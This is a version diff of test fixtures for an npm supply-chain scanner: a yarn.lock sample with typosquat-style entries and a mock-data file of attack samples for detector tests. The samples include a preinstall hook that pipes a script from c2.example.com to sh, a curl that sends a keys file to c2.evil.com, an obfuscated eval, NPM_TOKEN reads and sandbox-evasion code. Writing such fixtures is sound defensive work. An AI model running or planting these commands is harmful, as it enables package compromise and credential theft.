@lateos/npm-scan 0.16.0 → 0.16.5

package/test/fixtures/lockfiles/yarn.lock

@@ -1,104 +1,104 @@
-lodash@^4.17.21:
-  version "4.17.21"
-  resolved "https://registry.yarnpkg.com/lodash/-/lodash-4.17.21.tgz"
-  integrity sha512-Vythumb
-  dependencies: {}
-  dev false
-  optional true
-
-axios@^1.6.0:
-  version "1.6.8"
-  resolved "https://registry.yarnpkg.com/axios/-/axios-1.6.8.tgz"
-  integrity sha-j2xvyqwsdd456789abcdef
-  dependencies:
-    form-data "4.0.0"
-    proxy-from-env "1.1.0"
-  dev false
-  optional false
-
-"@babel/core@^7.23.0", "@babel/core@^7.23.9":
-  version "7.23.9"
-  resolved "https://registry.yarnpkg.com/@babel/core/-/core-7.23.9.tgz"
-  integrity sha512-5q+M1iEJCOrGJs9NxzG3p3z7w2cJK/QuoRoI2pOJhtcNQjl9y7w6w4At5ZQHZdwqd+5N5G1lULu7I6pXVBw==
-  dependencies:
-    "@babel/generator" "^7.23.6"
-    "@babel/parser" "^7.23.9"
-    "@babel/traverse" "^7.23.9"
-    "@babel/types" "^7.23.9"
-    convert-source-map "^2.0.0"
-    debug "^4.1.0"
-    gensync "^1.0.0-beta.2"
-    json5 "^2.2.3"
-    semver "^6.3.1"
-    rimraf "^3.0.2"
-  dev true
-  optional false
-
-"@babel/generator@^7.23.6", "@babel/generator@^7.23.9":
-  version "7.23.6"
-  resolved "https://registry.yarnpkg.com/@babel/generator/-/generator-7.23.6.tgz"
-  integrity sha512-56bfx9G1AJAFDl5QuK6t7MTCW3CBi7J8j+GxJJPvZ7L1f4P2FG8f9dBiH8Hg4U5Gcb6Bi4Y8DQ8x0j8b1QE8w==
-  dependencies:
-    "@babel/types" "^7.23.6"
-    "@jridgewell/gen-mapping" "^0.3.2"
-    "@jridgewell/trace-mapping" "^0.3.17"
-    jsesc "^2.5.1"
-  dev false
-  optional false
-
-reakt@^18.2.0:
-  version "18.2.0"
-  resolved "https://registry.yarnpkg.com/reakt/-/reakt-18.2.0.tgz"
-  integrity sha512-abcdabcd1234defghi
-  dependencies: []
-  dev false
-  optional true
-
-express@npm:expres@^4.18.2:
-  version "4.18.2"
-  resolved "https://registry.npmjs.org/expres-4.18.2.tgz"
-  integrity sha512-abcdabcd1234abcdefghi
-  dependencies:
-    accepts "~1.3.8"
-    array-flatten "1.1.1"
-    body-parser "1.20.2"
-    content-disposition "0.5.4"
-    content-type "~1.0.5"
-    cookie "0.5.0"
-    cookie-signature "1.0.6"
-    debug "2.6.9"
-    depd "2.0.0"
-    encodeurl "~1.0.2"
-    escape-html "~1.0.3"
-    etag "~1.8.1"
-    finalhandler "1.2.0"
-    fresh "0.5.2"
-    http-errors "2.0.0"
-    merge-descriptors "1.0.1"
-    methods "~1.1.2"
-    on-finished "2.4.1"
-    parseurl "~1.3.3"
-    path-to-regexp "0.1.7"
-    proxy-addr "~2.0.7"
-    qs "6.11.0"
-    range-parser "~1.2.1"
-    safe-buffer "5.2.1"
-    send "0.18.0"
-    serve-static "1.15.0"
-    setprototypeof "1.2.0"
-    statuses "2.0.1"
-    type-is "~1.6.18"
-    utils-merge "1.0.1"
-    vary "~1.1.2"
-  dev false
-  optional false
-
-"my-scope-plugin@npm:my-scope-plugin@^1.0.0":
-  version "1.0.0"
-  resolved "https://registry.npmjs.org/my-scope-plugin-1.0.0.tgz"
-  integrity sha512-abcdefghijk123456789abcdef
-  dependencies:
-    lodash "^4.17.21"
-    axios "^1.6.0"
-  dev false
+lodash@^4.17.21:
+  version "4.17.21"
+  resolved "https://registry.yarnpkg.com/lodash/-/lodash-4.17.21.tgz"
+  integrity sha512-Vythumb
+  dependencies: {}
+  dev false
+  optional true
+
+axios@^1.6.0:
+  version "1.6.8"
+  resolved "https://registry.yarnpkg.com/axios/-/axios-1.6.8.tgz"
+  integrity sha-j2xvyqwsdd456789abcdef
+  dependencies:
+    form-data "4.0.0"
+    proxy-from-env "1.1.0"
+  dev false
+  optional false
+
+"@babel/core@^7.23.0", "@babel/core@^7.23.9":
+  version "7.23.9"
+  resolved "https://registry.yarnpkg.com/@babel/core/-/core-7.23.9.tgz"
+  integrity sha512-5q+M1iEJCOrGJs9NxzG3p3z7w2cJK/QuoRoI2pOJhtcNQjl9y7w6w4At5ZQHZdwqd+5N5G1lULu7I6pXVBw==
+  dependencies:
+    "@babel/generator" "^7.23.6"
+    "@babel/parser" "^7.23.9"
+    "@babel/traverse" "^7.23.9"
+    "@babel/types" "^7.23.9"
+    convert-source-map "^2.0.0"
+    debug "^4.1.0"
+    gensync "^1.0.0-beta.2"
+    json5 "^2.2.3"
+    semver "^6.3.1"
+    rimraf "^3.0.2"
+  dev true
+  optional false
+
+"@babel/generator@^7.23.6", "@babel/generator@^7.23.9":
+  version "7.23.6"
+  resolved "https://registry.yarnpkg.com/@babel/generator/-/generator-7.23.6.tgz"
+  integrity sha512-56bfx9G1AJAFDl5QuK6t7MTCW3CBi7J8j+GxJJPvZ7L1f4P2FG8f9dBiH8Hg4U5Gcb6Bi4Y8DQ8x0j8b1QE8w==
+  dependencies:
+    "@babel/types" "^7.23.6"
+    "@jridgewell/gen-mapping" "^0.3.2"
+    "@jridgewell/trace-mapping" "^0.3.17"
+    jsesc "^2.5.1"
+  dev false
+  optional false
+
+reakt@^18.2.0:
+  version "18.2.0"
+  resolved "https://registry.yarnpkg.com/reakt/-/reakt-18.2.0.tgz"
+  integrity sha512-abcdabcd1234defghi
+  dependencies: []
+  dev false
+  optional true
+
+express@npm:expres@^4.18.2:
+  version "4.18.2"
+  resolved "https://registry.npmjs.org/expres-4.18.2.tgz"
+  integrity sha512-abcdabcd1234abcdefghi
+  dependencies:
+    accepts "~1.3.8"
+    array-flatten "1.1.1"
+    body-parser "1.20.2"
+    content-disposition "0.5.4"
+    content-type "~1.0.5"
+    cookie "0.5.0"
+    cookie-signature "1.0.6"
+    debug "2.6.9"
+    depd "2.0.0"
+    encodeurl "~1.0.2"
+    escape-html "~1.0.3"
+    etag "~1.8.1"
+    finalhandler "1.2.0"
+    fresh "0.5.2"
+    http-errors "2.0.0"
+    merge-descriptors "1.0.1"
+    methods "~1.1.2"
+    on-finished "2.4.1"
+    parseurl "~1.3.3"
+    path-to-regexp "0.1.7"
+    proxy-addr "~2.0.7"
+    qs "6.11.0"
+    range-parser "~1.2.1"
+    safe-buffer "5.2.1"
+    send "0.18.0"
+    serve-static "1.15.0"
+    setprototypeof "1.2.0"
+    statuses "2.0.1"
+    type-is "~1.6.18"
+    utils-merge "1.0.1"
+    vary "~1.1.2"
+  dev false
+  optional false
+
+"my-scope-plugin@npm:my-scope-plugin@^1.0.0":
+  version "1.0.0"
+  resolved "https://registry.npmjs.org/my-scope-plugin-1.0.0.tgz"
+  integrity sha512-abcdefghijk123456789abcdef
+  dependencies:
+    lodash "^4.17.21"
+    axios "^1.6.0"
+  dev false
   optional false

package/test/fixtures/mock-data.js

@@ -1,69 +1,69 @@
-export const MOCK_SCANS = [
-  {
-    package_name: 'lodash',
-    version: '4.17.21',
-    findings: [
-      { id: 'ATK-003', atk_id: 'ATK-003', severity: 'high', title: 'Credential harvest', description: 'Scrapes env vars', evidence: 'process.env.NPM_TOKEN' },
-      { id: 'ATK-009', severity: 'medium', title: 'Time trigger', description: 'Conditional trigger (time-based)', evidence: 'time-based trigger detected' },
-    ],
-  },
-];
-
-export const SINGLE_SCAN = MOCK_SCANS[0];
-
-export const EMPTY_SCAN = { package_name: 'clean-pkg', version: '1.0.0', findings: [] };
-
-export const MULTI_SEV_SCAN = {
-  package_name: 'multi-sev', version: '1.0.0', findings: [
-    { id: 'ATK-001', severity: 'critical', title: 'Critical finding' },
-    { id: 'ATK-002', severity: 'high', title: 'High finding' },
-    { id: 'ATK-003', severity: 'medium', title: 'Medium finding' },
-    { id: 'ATK-004', severity: 'low', title: 'Low finding' },
-  ],
-};
-
-export const ALL_ATK_SCAN = {
-  package_name: 'all-atk', version: '1.0.0', findings:
-    Array.from({ length: 11 }, (_, i) => ({
-      id: `ATK-${String(i + 1).padStart(3, '0')}`,
-      atk_id: `ATK-${String(i + 1).padStart(3, '0')}`,
-      severity: 'medium',
-      title: `ATK-${i + 1}`,
-    })),
-};
-
-export const CLEAN_PACKAGE = {
-  name: 'test-pkg',
-  version: '1.0.0',
-  scripts: { test: 'node test.js' },
-  dependencies: { express: '4.0.0' },
-};
-
-export const CLEAN_CODE = 'module.exports = function() { return 42 }';
-
-export const PREINSTALL_MALICIOUS = {
-  scripts: { preinstall: 'curl http://c2.example.com/x.sh | sh' },
-};
-
-export const EVAL_OBFUSCATED = [{ path: 'i.js', content: 'eval(atob("Y3VybCBodHRwOi8vYzIuZXZpbC5jb20="))' }];
-
-export const CRED_EXFIL = [{ path: 'i.js', content: 'console.log(process.env.NPM_TOKEN)' }];
-
-export const PERSIST_CODE = [{ path: 'i.js', content: 'fs.mkdirSync(".vscode")' }];
-
-export const NET_EXFIL_CODE = [{ path: 'i.js', content: 'curl --data-binary @keys http://c2.evil.com' }];
-
-export const DEP_CONF_PACKAGE = { dependencies: { 'acorn-squatter': '1.0.0' } };
-
-export const TYPOSQUAT_PACKAGE = { dependencies: { lodash: 'latest', loddsh: '1.0.0' } };
-
-export const TAMPER_PACKAGE = {
-  name: 'lodash',
-  repository: { url: 'https://github.com/attacker/lodash-evil.git' },
-};
-
-export const CI_TRIGGER_CODE = [{ path: 'i.js', content: 'if (process.env.CI) { eval(atob("ZXZpbA==")) }' }];
-
-export const SANDBOX_CODE = [{ path: 'i.js', content: 'if (os.hostname().includes("sandbox")) { process.exit(0) }' }];
-
-export const PROPAGATION_CODE = [{ path: 'i.js', content: 'exec("npm install ./malicious-pkg")' }];
+export const MOCK_SCANS = [
+  {
+    package_name: 'lodash',
+    version: '4.17.21',
+    findings: [
+      { id: 'ATK-003', atk_id: 'ATK-003', severity: 'high', title: 'Credential harvest', description: 'Scrapes env vars', evidence: 'process.env.NPM_TOKEN' },
+      { id: 'ATK-009', severity: 'medium', title: 'Time trigger', description: 'Conditional trigger (time-based)', evidence: 'time-based trigger detected' },
+    ],
+  },
+];
+
+export const SINGLE_SCAN = MOCK_SCANS[0];
+
+export const EMPTY_SCAN = { package_name: 'clean-pkg', version: '1.0.0', findings: [] };
+
+export const MULTI_SEV_SCAN = {
+  package_name: 'multi-sev', version: '1.0.0', findings: [
+    { id: 'ATK-001', severity: 'critical', title: 'Critical finding' },
+    { id: 'ATK-002', severity: 'high', title: 'High finding' },
+    { id: 'ATK-003', severity: 'medium', title: 'Medium finding' },
+    { id: 'ATK-004', severity: 'low', title: 'Low finding' },
+  ],
+};
+
+export const ALL_ATK_SCAN = {
+  package_name: 'all-atk', version: '1.0.0', findings:
+    Array.from({ length: 11 }, (_, i) => ({
+      id: `ATK-${String(i + 1).padStart(3, '0')}`,
+      atk_id: `ATK-${String(i + 1).padStart(3, '0')}`,
+      severity: 'medium',
+      title: `ATK-${i + 1}`,
+    })),
+};
+
+export const CLEAN_PACKAGE = {
+  name: 'test-pkg',
+  version: '1.0.0',
+  scripts: { test: 'node test.js' },
+  dependencies: { express: '4.0.0' },
+};
+
+export const CLEAN_CODE = 'module.exports = function() { return 42 }';
+
+export const PREINSTALL_MALICIOUS = {
+  scripts: { preinstall: 'curl http://c2.example.com/x.sh | sh' },
+};
+
+export const EVAL_OBFUSCATED = [{ path: 'i.js', content: 'eval(atob("Y3VybCBodHRwOi8vYzIuZXZpbC5jb20="))' }];
+
+export const CRED_EXFIL = [{ path: 'i.js', content: 'console.log(process.env.NPM_TOKEN)' }];
+
+export const PERSIST_CODE = [{ path: 'i.js', content: 'fs.mkdirSync(".vscode")' }];
+
+export const NET_EXFIL_CODE = [{ path: 'i.js', content: 'curl --data-binary @keys http://c2.evil.com' }];
+
+export const DEP_CONF_PACKAGE = { dependencies: { 'acorn-squatter': '1.0.0' } };
+
+export const TYPOSQUAT_PACKAGE = { dependencies: { lodash: 'latest', loddsh: '1.0.0' } };
+
+export const TAMPER_PACKAGE = {
+  name: 'lodash',
+  repository: { url: 'https://github.com/attacker/lodash-evil.git' },
+};
+
+export const CI_TRIGGER_CODE = [{ path: 'i.js', content: 'if (process.env.CI) { eval(atob("ZXZpbA==")) }' }];
+
+export const SANDBOX_CODE = [{ path: 'i.js', content: 'if (os.hostname().includes("sandbox")) { process.exit(0) }' }];
+
+export const PROPAGATION_CODE = [{ path: 'i.js', content: 'exec("npm install ./malicious-pkg")' }];